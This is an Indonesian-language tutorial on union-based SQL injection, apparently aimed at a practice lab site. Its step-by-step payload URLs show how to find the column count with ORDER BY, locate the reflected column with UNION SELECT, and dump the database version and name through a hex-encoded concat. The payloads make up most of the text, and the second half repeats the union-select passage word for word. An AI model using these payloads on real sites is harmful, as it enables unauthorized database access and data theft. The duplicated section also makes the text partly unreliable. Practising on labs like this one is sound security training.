SQL INJECTION UNION BASED
Ok welcome guys kali ini saya akan share tentang sql injection union based
SQL INJECTION adalah adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQLatau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. (wikipedia)
Sql Injection di klarifaikasi kan berdasarkan value parameternya, yaitu
1. integer based sql injection
2. string based sql injection
kita bahas yang pertama dahulu yaitu integer.
web yang berjenis integer based tidak dapat di balancing (--+-)
jadi kita harus menghilangkan single quotenya dahulu (')
contoh web integer
http://zixem.altervista.org/SQLi/level1.php?id=1'--+
dan untuk string baseed yaitu sebaliknya :)
pham kan? ezzz juga :v
ok lanjut sekarang kita inject webnya :)
kita ketikkan order+by smpai ketemu eror
http://zixem.altervista.org/SQLi/level1.php?id=1+order+by+1--+ no eror
http://zixem.altervista.org/SQLi/level1.php?id=1+order+by+2--+ no eror
http://zixem.altervista.org/SQLi/level1.php?id=1+order+by+3--+ no eror
http://zixem.altervista.org/SQLi/level1.php?id=1+order+by+4--+ EROR
kita ketahui columnnya ada 3,
karna waktu kita order by ke 4 eror.
next lanjut kita union select
http://zixem.altervista.org/SQLi/level1.php?id=1+union+select+1,2,3--+
jika tidak angka vulnnya tidak muncul maka tambahkan (-) sebelum angka, seperti ini
http://zixem.altervista.org/SQLi/level1.php?id=-1+union+select+1,2,3--+
kita lihat angka vuulnya yaitu 2
sekarang kita print version database dan nick
seperti ini
http://zixem.altervista.org/SQLi/level1.php?id=-1+union+select+1,concat(0x3c666f6e7420636f6c6f723d27726564273e,0x34465a344e,0x3c62723e,@@version,0x3c62723e,database(),0x3c2f666f6e743e),3--+
karna waktu kita order by ke 4 eror.
next lanjut kita union select
http://zixem.altervista.org/SQLi/level1.php?id=1+union+select+1,2,3--+
jika tidak angka vulnnya tidak muncul maka tambahkan (-) sebelum angka, seperti ini
http://zixem.altervista.org/SQLi/level1.php?id=-1+union+select+1,2,3--+
kita lihat angka vuulnya yaitu 2
sekarang kita print version database dan nick
seperti ini
http://zixem.altervista.org/SQLi/level1.php?id=-1+union+select+1,concat(0x3c666f6e7420636f6c6f723d27726564273e,0x34465a344e,0x3c62723e,@@version,0x3c62723e,database(),0x3c2f666f6e743e),3--+
